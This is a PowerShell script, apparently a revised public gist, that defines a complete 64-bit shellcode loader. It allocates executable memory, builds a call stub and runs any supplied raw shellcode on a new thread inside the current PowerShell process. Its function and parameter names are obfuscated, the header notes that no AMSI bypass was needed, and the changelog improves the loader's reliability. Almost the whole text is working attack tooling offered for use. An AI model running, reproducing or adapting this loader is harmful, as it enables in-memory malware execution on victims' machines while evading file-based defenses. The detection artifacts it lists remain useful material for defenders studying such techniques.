PowerShell, 64-bit only: local (self-)process shellcode injection — the payload is mapped RWX and started on a new thread inside the current PowerShell process. Per the author, no AMSI bypass was needed. Credit to mattifestation for the initial implementation.
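function t783grubyire79ui34ewui
{
    <#
    .SYNOPSIS
    Executes a raw 64-bit shellcode blob on a new thread inside the current
    PowerShell process (self-injection).

    .DESCRIPTION
    Steps, in order:
      1. VirtualAlloc a private RWX (PAGE_EXECUTE_READWRITE) region and copy
         the payload into it.
      2. Resolve kernel32!ExitThread via GetModuleHandle/GetProcAddress.
      3. Build a 26-byte x64 stub in a second RWX region:
           mov rax, <payload> ; call rax ; push 0 ; mov rax, <ExitThread> ; call rax
      4. CreateThread on the stub, passing the payload address as the thread
         parameter (so RCX holds it when the stub starts).
      5. Wait up to 5 s for the thread. Only if it has exited are both regions
         released; otherwise they are deliberately left mapped so a payload
         that is still running is not freed out from under itself.

    Defender-visible artifacts produced by this function as written: an
    Add-Type compile of a 'Win32' class (on Windows PowerShell this typically
    spawns csc.exe and writes temp files), two RWX VirtualAlloc calls from the
    PowerShell host, and a CreateThread whose start address is not backed by
    any image on disk.

    .PARAMETER y2wuirg9348wpor239weoui
    Position-independent x64 shellcode. Must be non-empty. The stub does not
    reserve a 32-byte shadow space or realign RSP before `call rax`, so the
    payload is assumed to handle its own stack alignment.

    .NOTES
    Changes relative to the earlier revision of this gist:
      - VirtualFree with MEM_RELEASE requires dwSize == 0 (documented Win32
        contract). The old code passed the allocation length, so both frees
        failed and nothing was ever released.
      - Memory is released only after WaitForSingleObject reports the thread
        has exited; on timeout it is left mapped instead of freed under a
        running thread.
      - The thread handle returned by CreateThread is now closed.
      - Add-Type is skipped when 'Win32' already exists, so the function can
        be called more than once in a session.
      - VirtualAlloc/GetProcAddress/CreateThread failures raise instead of
        being ignored.
      - SIZE_T parameters are marshalled as UIntPtr rather than Int32.
    #>
    Param(
        [Parameter(Mandatory = $true)]
        [ValidateNotNullOrEmpty()]
        [Byte[]]$y2wuirg9348wpor239weoui
    )

    Set-StrictMode -Version 2.0

    # Add-Type throws if the type name is already loaded, so compile only once
    # per session. NOTE(review): if another script defined a different 'Win32'
    # class first, the P/Invoke members used below may be missing.
    if (-not ([System.Management.Automation.PSTypeName]'Win32').Type)
    {
        Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;

public static class Win32
{
    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    public static extern IntPtr GetModuleHandle(string lpModuleName);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern uint WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

    // dwSize is SIZE_T: marshal as UIntPtr so it is 64 bits wide on x64.
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, UInt32 flAllocationType, UInt32 flProtect);

    [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool VirtualFree(IntPtr lpAddress, UIntPtr dwSize, UInt32 dwFreeType);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, UInt32 dwCreationFlags, out IntPtr lpThreadId);

    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool CloseHandle(IntPtr hObject);
}
"@
    }

    $Marshal = [System.Runtime.InteropServices.Marshal]

    # Win32 constants used below.
    $MEM_COMMIT_RESERVE     = [UInt32]0x3000      # MEM_COMMIT | MEM_RESERVE
    $PAGE_EXECUTE_READWRITE = [UInt32]0x40
    $MEM_RELEASE            = [UInt32]0x8000
    $WAIT_OBJECT_0          = [UInt32]0
    $WAIT_TIMEOUT           = [UInt32]0x102
    $TIMEOUT_MS             = [UInt32]5000        # unchanged from the original

    # Builds the x64 trampoline that calls the payload and then ExitThread.
    function Local:Emit-CallThreadStub ([IntPtr] $BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Architecture)
    {
        # The opcodes below carry a REX.W prefix and 8-byte immediates, so the
        # stub is x64-only; a 32-bit request would produce a malformed stub.
        if ($Architecture -ne 64)
        {
            throw "Emit-CallThreadStub: only 64-bit stubs are supported (got $Architecture)."
        }

        # BitConverter emits host byte order, which is little-endian on every
        # Windows x64 host this code can run on.
        $payloadImm    = [BitConverter]::GetBytes($BaseAddr.ToInt64())
        $exitThreadImm = [BitConverter]::GetBytes($ExitThreadAddr.ToInt64())

        [Byte[]] $stub = @()
        $stub += 0x48, 0xB8     # mov rax, imm64 (payload address)
        $stub += $payloadImm
        $stub += 0xFF, 0xD0     # call rax
        # push 0 does not set RCX (x64 passes the first argument in a register),
        # so ExitThread's exit code is whatever RCX holds when the payload
        # returns. Kept for fidelity with the original stub; purely cosmetic.
        $stub += 0x6A, 0x00     # push 0
        $stub += 0x48, 0xB8     # mov rax, imm64 (ExitThread)
        $stub += $exitThreadImm
        $stub += 0xFF, 0xD0     # call rax
        return $stub
    }

    [Byte[]] $payload = $y2wuirg9348wpor239weoui

    # +1 byte of slack mirrors the original; VirtualAlloc rounds up to a page anyway.
    $payloadSize   = [UIntPtr]::new([UInt64]($payload.Length + 1))
    $payloadRegion = [Win32]::VirtualAlloc([IntPtr]::Zero, $payloadSize, $MEM_COMMIT_RESERVE, $PAGE_EXECUTE_READWRITE)
    if ($payloadRegion -eq [IntPtr]::Zero)
    {
        throw "VirtualAlloc for payload failed (Win32 error $($Marshal::GetLastWin32Error()))."
    }

    $stubRegion   = [IntPtr]::Zero
    $threadHandle = [IntPtr]::Zero
    $threadDone   = $false
    try
    {
        $Marshal::Copy($payload, 0, $payloadRegion, $payload.Length)

        $exitThread = [Win32]::GetProcAddress([Win32]::GetModuleHandle("kernel32.dll"), "ExitThread")
        if ($exitThread -eq [IntPtr]::Zero)
        {
            throw "GetProcAddress(kernel32!ExitThread) failed (Win32 error $($Marshal::GetLastWin32Error()))."
        }

        [Byte[]] $stub = Emit-CallThreadStub $payloadRegion $exitThread 64
        $stubSize   = [UIntPtr]::new([UInt64]($stub.Length + 1))
        $stubRegion = [Win32]::VirtualAlloc([IntPtr]::Zero, $stubSize, $MEM_COMMIT_RESERVE, $PAGE_EXECUTE_READWRITE)
        if ($stubRegion -eq [IntPtr]::Zero)
        {
            throw "VirtualAlloc for call stub failed (Win32 error $($Marshal::GetLastWin32Error()))."
        }
        $Marshal::Copy($stub, 0, $stubRegion, $stub.Length)

        # The payload address is also handed over as lpParameter (RCX on entry).
        $threadId     = [IntPtr]::Zero
        $threadHandle = [Win32]::CreateThread([IntPtr]::Zero, [UIntPtr]::Zero, $stubRegion, $payloadRegion, 0, [Ref] $threadId)
        if ($threadHandle -eq [IntPtr]::Zero)
        {
            throw "CreateThread failed (Win32 error $($Marshal::GetLastWin32Error()))."
        }

        $wait = [Win32]::WaitForSingleObject($threadHandle, $TIMEOUT_MS)
        if ($wait -eq $WAIT_OBJECT_0)
        {
            $threadDone = $true
        }
        elseif ($wait -eq $WAIT_TIMEOUT)
        {
            Write-Warning "Payload thread $threadId is still running after $TIMEOUT_MS ms; leaving both RWX regions mapped."
        }
        else
        {
            Write-Warning "WaitForSingleObject returned 0x$($wait.ToString('X')) (Win32 error $($Marshal::GetLastWin32Error())); leaving both RWX regions mapped."
        }
    }
    finally
    {
        if ($threadHandle -ne [IntPtr]::Zero)
        {
            [Win32]::CloseHandle($threadHandle) | Out-Null
        }

        # MEM_RELEASE requires dwSize == 0; the previous revision passed the
        # allocation length and both calls silently failed. Release only when
        # the thread has provably exited or was never started -- never
        # underneath a running thread.
        if ($threadDone -or ($threadHandle -eq [IntPtr]::Zero))
        {
            if ($stubRegion -ne [IntPtr]::Zero)
            {
                [Win32]::VirtualFree($stubRegion, [UIntPtr]::Zero, $MEM_RELEASE) | Out-Null
            }
            [Win32]::VirtualFree($payloadRegion, [UIntPtr]::Zero, $MEM_RELEASE) | Out-Null
        }
    }
}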